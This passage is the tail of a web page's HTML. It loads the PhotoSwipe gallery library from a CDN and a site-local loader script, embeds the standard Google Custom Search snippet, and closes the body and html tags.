<script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe-ui-default.min.js" integrity="sha384-m67o7SkQ1ALzKZIFh4CiTA8tmadaujiTa9Vu+nqPSwDOqHrDmxLezTdFln8077+q" crossorigin="anonymous"></script><script src="https://omega-coder.ninja/js/load-photoswipe.js"></script>



<script>
  (function() {
    var cx = '003875270731666154786:4mbkqyjjjjy';
    var gcse = document.createElement('script');
    gcse.type = 'text/javascript';
    gcse.async = true;
    gcse.src = 'https://cse.google.com/cse.js?cx=' + cx;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(gcse, s);
  })();
</script>







  </body>
</html>

